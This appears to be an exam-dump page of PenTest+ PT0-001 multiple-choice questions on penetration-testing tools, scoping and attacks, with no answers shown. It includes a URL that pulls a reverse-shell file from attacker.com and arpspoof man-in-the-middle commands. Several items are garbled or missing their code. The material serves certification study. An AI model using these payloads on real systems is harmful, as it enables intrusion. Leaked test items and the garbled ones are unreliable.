Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dpt65

PT0-001 Questions and Answers

Question # 6

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A.

Implement a blacklist.

B.

Block URL redirections.

C.

Double URL encode the parameters.

D.

Stop external calls from the application.

Full Access
Question # 7

Which of the following tools is used to perform a credential brute force attack?

A.

Hydra

B.

John the Ripper

C.

Hashcat

D.

Peach

Full Access
Question # 8

An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack Which of the following actions should the penetration tester take?

A.

Attempt to use the remnant tools to achieve persistence

B.

Document the presence of the left-behind tools in the report and proceed with the test

C.

Remove the tools from the affected systems before continuing on with the test

D.

Discontinue further testing and report the situation to management

Full Access
Question # 9

A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?

A.

Karma

B.

Kismet

C.

Pixie

D.

NetStumbler

Full Access
Question # 10

A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

A.

DNS cache poisoning

B.

Record and replay

C.

Supervisory server SMB

D.

Blind SQL injection

Full Access
Question # 11

Performance based

You are a penetration Inter reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

Full Access
Question # 12

A penetration testing company was hired to conduct a penetration test against Company A's network of 20.10.10.0/24 and mail.companyA.com. While the penetration testing company was in the information gathering phase, it was discovered that the mail.companyA.com IP address resolved to 20.15.1.2 and belonged to Company B. Which of the following would be the BEST solution to conduct penetration testing against mail.companyA.com?

A.

The penetration tester should conduct penetration testing against mail.companyA.com because the domain name is in scope.

B.

The penetration tester should ask Company A for a signed statement giving permission to conduct a test against mail.companyA.com.

C.

The penetration tester should ignore mail.companyA.com testing and complete only the network range 20.10.10.0/24.

D.

The penetration tester should only use passive open source intelligence gathering methods leveraging publicly available information to analyze mail.companyA.com.

Full Access
Question # 13

An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?

A.

Ensure all protocols are using encryption.

B.

Employ network ACLs.

C.

Disable source routing on the server.

D.

Ensure the IDS rules have been updated.

Full Access
Question # 14

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

A.

TCP SYN flood

B.

SQL injection

C.

xss

D.

XMAS scan

Full Access
Question # 15

After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

A.

Run a zero-day exploit.

B.

Create a new domain user with a known password.

C.

Modify a known boot time service to instantiate a call back.

D.

Obtain cleartext credentials of the compromised user.

Full Access
Question # 16

Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?

A.

. /wordlists/rockyou.txt

B.

./dirb/wordlists/big.txt

C.

./wfuzz/wordlist''vulns/sq1_inj -txt

D.

./wordlists/raeta3ploit/roet_uaerpass.txt

Full Access
Question # 17

Defining exactly what is to be tested and the results to be generated from the test will help prevent?

A.

testing scope creep

B.

scheduling conflicts

C.

impact on production

D.

disclosure of information.

Full Access
Question # 18

A client has scheduled a wireless penetration test. Which of the following describes the scoping target

information MOST likely needed before testing can begin?

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Full Access
Question # 19

A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

A.

arPspoof

B.

nmap

C.

responder

D.

burpsuite

Full Access
Question # 20

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A.

Download the GHOST file to a Linux system and compile

gcc -o GHOST

test i:

./GHOST

B.

Download the GHOST file to a Windows system and compile

gcc -o GHOST GHOST.c

test i:

./GHOST

C.

Download the GHOST file to a Linux system and compile

gcc -o GHOST GHOST.c

test i:

./GHOST

D.

Download the GHOST file to a Windows system and compile

gcc -o GHOST

test i:

./GHOST

Full Access
Question # 21

An individual has been hired by an organization after passing a background check. The individual has been

passing information to a competitor over a period of time. Which of the following classifications BEST

describes the individual?

A.

APT

B.

Insider threat

C.

Script kiddie

D.

Hacktivist

Full Access
Question # 22

A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?

A.

NiktO

B.

WAR

C.

W3AF

D.

Swagger

Full Access
Question # 23

A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of

the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of

the following is the BEST method for a tester to confirm the vulnerability exists?

A.

Manually run publicly available exploit code.

B.

Confirm via evidence of the updated version number.

C.

Run the vulnerability scanner again.

D.

Perform dynamic analysis on the vulnerable service.

Full Access
Question # 24

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Give the below code and output

Import requests

from BeautifulSoup import BeautifulSoup

request = requests.get (“https://www.bank.com/admin ”)

respHeaders, respBody = request[0]. Request[1]

if respHeader.statuscode == 200:

soup = BeautifulSoup (respBody)

soup = soup.FindAll (“div”, (“type” : “hidden”))

print respHeader. StatusCode, StatusMessage

else:

print respHeader. StatusCode, StatusMessage

Output: 200 OK

Which of the following is the tester intending to do?

A.

Horizontally escalate privileges

B.

Scrape the page for hidden fields

C.

Analyze HTTP respond code

D.

Search for HTTP headers

Full Access
Question # 25

Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?

A.

If an NDA is signed with the CDN company

B.

If the SSL certificates for the web application are valid

C.

If a list of the applicable WAF rules was obtained

D.

If the IP addresses for the penetration tester are whitelisted on the WAF

Full Access
Question # 26

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used

in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A.

ICS vendors are slow to implement adequate security controls.

B.

ICS staff are not adequately trained to perform basic duties.

C.

There is a scarcity of replacement equipment for critical devices.

D.

There is a lack of compliance for ICS facilities.

Full Access
Question # 27

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.

Which of the following BEST describes the reasoning for this?

A.

Manufacturers developing IoT devices are less concerned with security.

B.

It is difficult for administrators to implement the same security standards across the board.

C.

IoT systems often lack the hardware power required by more secure solutions.

D.

Regulatory authorities often have lower security requirements for IoT systems.

Full Access
Question # 28

Which of the following BEST protects against a rainbow table attack?

D18912E1457D5D1DDCBD40AB3BF70D5D

A.

Increased password complexity

B.

Symmetric encryption

C.

Cryptographic salting

D.

Hardened OS configurations

Full Access
Question # 29

During a penetration test, a host is discovered that appears to have been previously compromised and has an active outbound connection. After verifying the network activity is malicious, which of the following should the tester do?

A.

Inform the client to shut it down and investigate.

B.

Take action and shut it down immediately.

C.

Inform the client and allow them to respond.

D.

Note the finding and continue the assessment.

Full Access
Question # 30

A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester

to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete

after the tester delivers the report?

A.

Removing shells

B.

Obtaining client acceptance

C.

Removing tester-created credentials

D.

Documenting lessons learned

E.

Presenting attestation of findings

Full Access
Question # 31

A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

A.

Subject key identifier

B.

Subject alternative name

C.

Authority information access

D.

Service principal name

Full Access
Question # 32

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

A.

Attempt to crack the service account passwords.

B.

Attempt DLL hijacking attacks.

C.

Attempt to locate weak file and folder permissions.

D.

Attempt privilege escalation attacks.

Full Access
Question # 33

A manager calls upon a tester to assist with diagnosing an issue within the following Python script:

#!/usr/bin/python

s = “Administrator”

The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Full Access
Question # 34

When performing active information reconnaissance, which of the following should be tested FIRST before starting the exploitation process?

A.

SQLmap

B.

TLS configuration

C.

HTTP verbs

D.

Input fields

Full Access
Question # 35

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

A.

Wait outside of the company’s building and attempt to tailgate behind an employee.

B.

Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

C.

Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D.

Search social media for information technology employees who post information about the technologies they work with.

E.

Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

Full Access
Question # 36

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20

NETMASK: 255.255.255.0

DEFAULT GATEWAY: 192.168.1.254

DHCP: 192.168.1.253

DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

A.

arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B.

arpspoof -t 192.168.1.20 192.168.1.254

C.

arpspoof -c both -t 192.168.1.20 192.168.1.253

D.

arpspoof -r -t 192 .168.1.253 192.168.1.20

Full Access
Question # 37

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

A.

Shodan

B.

SET

C.

BeEF

D.

Wireshark

E.

Maltego

F.

Dynamo

Full Access
Question # 38

While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?

A.

Have random and unique credentials per system.

B.

Disable the administrator login from the network.

C.

Use a service account for administrative functions.

D.

Implement a single rotating password for systems.

Full Access
Question # 39

A penetration tester is performing a code review against a web application Given the following URL and source code:

Which of the following vulnerabilities is present in the code above?

A.

SQL injection

B.

Cross-site scripting

C.

Command injection

D.

LDAP injection

Full Access
Question # 40

Which of the following documents BEST describes the manner in which a security assessment will be conducted?

A.

BIA

B.

SOW

C.

SLA

D.

MSA

Full Access
Question # 41

Which of the following are MOST important when planning for an engagement? (Select TWO).

A.

Goals/objectives

B.

Architectural diagrams

C.

Tolerance to impact

D.

Storage time for a report

E.

Company policies

Full Access
Question # 42

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

  • Code review
  • Updates to firewall settings

Which of the following has occurred in this situation?

A.

Scope creep

B.

Post-mortem review

C.

Risk acceptance

D.

Threat prevention

Full Access
Question # 43

If a security consultant comes across a password hash that resembles the following

b117 525b3454 7Oc29ca3dBaeOb556ba8

Which of the following formats is the correct hash type?

A.

Kerberos

B.

NetNTLMvl

C.

NTLM

D.

SHA-1

Full Access
Question # 44

Given the following HTTP response:

http/1.0 200 OK

Server: Apache

Set-Cookie: AUTHID=879DHUT74D9A7C; http-only

Content-type: text/html

Connection: Close

Which of the following aspects of an XSS attack would be prevented?

A.

Client-side website defacement

B.

Session hijacking

C.

Cross-site request forgery

D.

JavaScript keylogging

Full Access